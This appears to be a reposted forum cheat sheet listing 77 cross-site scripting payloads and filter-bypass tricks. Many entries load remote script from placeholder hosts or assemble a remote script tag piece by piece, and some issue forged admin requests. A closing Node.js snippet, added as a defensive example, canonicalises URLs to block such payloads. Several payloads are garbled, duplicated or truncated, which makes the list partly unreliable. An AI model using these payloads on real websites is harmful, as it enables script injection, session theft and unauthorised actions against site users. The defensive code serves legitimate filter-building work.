
XSS attack roundup: friends doing website security should take note

March 4, 2018  | 移动技术网 Network Operations
It seems t00ls has rather little material on XSS; I saw something good and copied it over, not sure whether any classmates need to Mark it... 12-10-16
(1) Ordinary XSS JavaScript injection
<script src=http://3w.org/xss/xss.js></script>
(2) img tag XSS using a JavaScript command
<script src=http://3w.org/xss/xss.js></script>
(3) img tag with no semicolon and no quotes
<img src=javascript:alert('xss')>
(4) img tag, case insensitive
<img src=javascript:alert('xss')>
(5) HTML encoding (semicolon required)
<img src=javascript:alert("xss")>
(6) Malformed img tag
<img """><script>alert("xss")</script>">
(7) fromCharCode tag (calculator)
<img src=javascript:alert(string.fromcharcode(88,83,83))>
(8) UTF-8 Unicode encoding (calculator)
<img src=jav..omitted..s')>
(9) 7-bit UTF-8 Unicode encoding without semicolons (calculator)
<img src=jav..omitted..s')>
(10) Hex encoding, also without semicolons (calculator)
<img src=&#x6a&#x61&#x76&#x61..omitted..&#x58&#x53&#x53&#x27&#x29>
(11) Embedded tab, splitting up "javascript"
<img src="jav ascript:alert('xss');">
(12) Embedded encoded tab, splitting up "javascript"
<img src="jav ascript:alert('xss');">
(13) Embedded newline
<img src="jav ascript:alert('xss');">
(14) Embedded carriage return
<img src="jav ascript:alert('xss');">
(15) Embedded multi-line JavaScript injection; this is an extreme XSS example
<img src="javascript:alert('xss')">
(16) Working around character limits (must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval_r(z)</script>
12-7-1 t00ls - powered by discuz! board
https://www.t00ls.net/viewthread.php?action=printable&tid=15267 2/6
(17) Null character
perl -e 'print "<img src=java\0script:alert(\"xss\")>";' > out
(18) Null character 2; null characters are basically useless domestically, because there is nowhere to make use of them
perl -e 'print "<scr\0ipt>alert(\"xss\")</scr\0ipt>";' > out
(19) Spaces and meta characters before the img tag
<img src=" javascript:alert('xss');">
(20) non-alpha-non-digit XSS
<script/xss src="http://3w.org/xss/xss.js"></script>
(21) non-alpha-non-digit XSS 2
<body onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("xss")>
(22) non-alpha-non-digit XSS 3
<script/src="http://3w.org/xss/xss.js"></script>
(23) Double open brackets
<<script>alert("xss");//<</script>
(24) No closing script tag (Firefox and similar browsers only)
<script src=http://3w.org/xss/xss.js?<b>
(25) No closing script tag 2
<script src=//3w.org/xss/xss.js>
(26) Half-open HTML/JavaScript XSS
<img src="javascript:alert('xss')"
(27) Double open angle brackets
<iframe src=http://3w.org/xss.html <
(28) No single quotes, double quotes or semicolons
<script>a=/xss/
alert(a.source)</script>
(29) JavaScript with escape filtering
\";alert('xss');//
(30) Closing the title tag
</title><script>alert("xss");</script>
(31) input image
<input src="javascript:alert('xss');">
(32) body image
<body background="javascript:alert('xss')">
(33) body tag
<body('xss')>
(34) img dynsrc
<img dynsrc="javascript:alert('xss')">
(35) img lowsrc
<img lowsrc="javascript:alert('xss')">
(36) bgsound
<bgsound src="javascript:alert('xss');">
(37) style sheet
<link rel="stylesheet" href="javascript:alert('xss');">
(38) Remote style sheet
<link rel="stylesheet" href="http://3w.org/xss.css">
(39) list-style-image (list style)
<style>li {list-style-image: url("javascript:alert('xss')");}</style><ul><li>xss
(40) img vbscript
<img src='vbscript:msgbox("xss")'></style><ul><li>xss
(41) meta link URL
<meta http-equiv="refresh" content="0;
url=http://;url=javascript:alert('xss');">
(42) iframe
<iframe src="javascript:alert('xss');"></iframe>
(43) frame
<frameset><frame src="javascript:alert('xss');"></frameset>
(44) table
<table background="javascript:alert('xss')">
(45) td
<table><td background="javascript:alert('xss')">
(46) div background-image
<div style="background-image: url(javascript:alert('xss'))">
(47) div background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<div style="background-image: url(javascript:alert('xss'))">
(48) div expression
<div style="width: expression_r(alert('xss'));">
(49) Split expression in the style attribute
<img style="xss:expression_r(alert('xss'))">
(50) Anonymous style (made up of an open angle bracket followed by a letter)
<xss style="xss:expression_r(alert('xss'))">
(51) style background-image
<style>.xss{background-image:url("javascript:alert('xss')");}</style><a class=xss></a>
(52) img style method
exppression(alert("xss"))'>
(53) style background
<style><style type="text/css">body{background:url("javascript:alert('xss')")}</style>
(54) base
<base href="javascript:alert('xss');//">
(55) embed tag: you can embed Flash, with the XSS contained inside it
<embed src="http://3w.org/xss/xss.swf" ></embed>
(56) Using ActionScript inside Flash, you can smuggle your XSS code in
a="get";
b="url(\"";
c="javascript:";
d="alert('xss');\")";
eval_r(a+b+c+d);
(57) XML namespace; the .htc file must be on the same server as your XSS carrier
<html xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/xss/xss.htc">
<xss:xss>xss</xss:xss>
</html>
(58) If your JS is filtered, you can add JS code inside an image to exploit it
<script src=""></script>
(59) img embedded command; can execute arbitrary commands
<img src="http://www.xxx.com/a.php?a=b">
(60) img embedded command (a.jpg on the same server)
redirect 302 /a.jpg http://www.xxx.com/admin.asp&deleteuser
(61) Bypassing symbol filtering
<script a=">" src="http://3w.org/xss.js"></script>
(62)
<script =">" src="http://3w.org/xss.js"></script>
(63)
<script a=">" " src="http://3w.org/xss.js"></script>
(64)
<script "a='>'" src="http://3w.org/xss.js"></script>
(65)
<script a=`>` src="http://3w.org/xss.js"></script>
(66)
<script a=">'>" src="http://3w.org/xss.js"></script>
(67)
<script>document.write("<scri");</script>pt src="http://3w.org/xss.js"></script>
(68) URL bypass
<a href="http://127.0.0.1/">xss</a>
(69) URL encoding
<a href="http://3w.org">xss</a>
(70) IP in decimal
<a href="http://3232235521'>xss</a>
(71) IP in hexadecimal
<a href="http://0xc0.0xa8.0x00.0x01'>xss</a>
(72) IP in octal
<a href="http://0300.0250.0000.0001'>xss</a>
(73) Mixed encoding
<a href="h
tt p://6 6.000146.0x7.147/"">xss</a>
(74) Dropping [http:]
<a href="//www.google.com/">xss</a>
(75) Dropping [www]
<a href="http://google.com/">xss</a>
(76) Absolute dot, absolute DNS
<a href="http://www.google.com./">xss</a>
(77) JavaScript link
<a href="javascript:document.location='http://www.google.com/'">xss</a>
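Added defender-side example, not part of the original post or of the cheat sheet it copies: the encoding tricks in (3)-(19) and (31)-(54) and the host obfuscations in (68)-(77) all rely on what the browser does to an attribute value before acting on it, so a filter that compares the raw string misses them. The code below, assuming Node.js and its WHATWG URL parser, decodes HTML character references the way the HTML parser does (semicolon optional), resolves the value against an assumed page origin, and then checks the scheme and the canonical host; the allowlist and origin are assumed values.

```javascript
// Added example, not from the original post: canonicalise a raw HTML URL
// attribute the way a browser does, then decide whether to allow it.
// Assumes Node.js (WHATWG URL class). Only numeric character references
// and a few named ones are decoded; a real sanitiser needs the full table.
const NAMED_REFS = { tab: "\t", newline: "\n", lt: "<", gt: ">", quot: '"', amp: "&" };

// The HTML parser decodes character references in attribute values before
// the URL parser sees them, and accepts numeric references with no trailing
// semicolon, so &#106&#97... and &#x6a&#x61... still spell "javascript:".
function decodeEntities(s) {
  return s.replace(/&(#x[0-9a-f]+|#[0-9]+|[a-z]+);?/gi, (match, ref) => {
    if (ref[0] !== "#") return NAMED_REFS[ref.toLowerCase()] ?? match;
    const cp = /^#x/i.test(ref) ? parseInt(ref.slice(2), 16) : parseInt(ref.slice(1), 10);
    return cp > 0x10ffff ? match : String.fromCodePoint(cp);
  });
}

const SAFE_SCHEMES = new Set(["http:", "https:"]);

// Resolve the decoded value against the page origin. The WHATWG parser trims
// leading/trailing C0 controls and spaces, deletes every embedded tab, LF and
// CR, and lowercases the scheme, so " javascript:", "jav\tascript:" and
// "JaVaScRiPt:" all come out as javascript:. An embedded NUL, by contrast,
// is not a scheme character, so that value becomes a harmless relative path.
function classifyUrl(rawAttr, pageOrigin = "https://example.invalid/") {
  let url;
  try {
    url = new URL(decodeEntities(rawAttr), pageOrigin);
  } catch {
    return { scheme: null, host: null, safe: false };
  }
  // Numeric hosts (3232235521, 0xc0.0xa8.0x00.0x01, 0300.0250.0000.0001,
  // 66.000146.0x7.147) are normalised to dotted decimal by the parser; the
  // trailing dot of an absolute DNS name (www.google.com.) is not, so drop it.
  const host = url.hostname.replace(/\.$/, "");
  return { scheme: url.protocol, host, safe: SAFE_SCHEMES.has(url.protocol) };
}

// Link allowlist: http(s) only, with the host compared after canonicalisation
// so protocol-relative and obfuscated-IP forms cannot slip past a string match.
function isAllowedLink(rawAttr, allowedHosts, pageOrigin) {
  const { host, safe } = classifyUrl(rawAttr, pageOrigin);
  return safe && allowedHosts.includes(host);
}
```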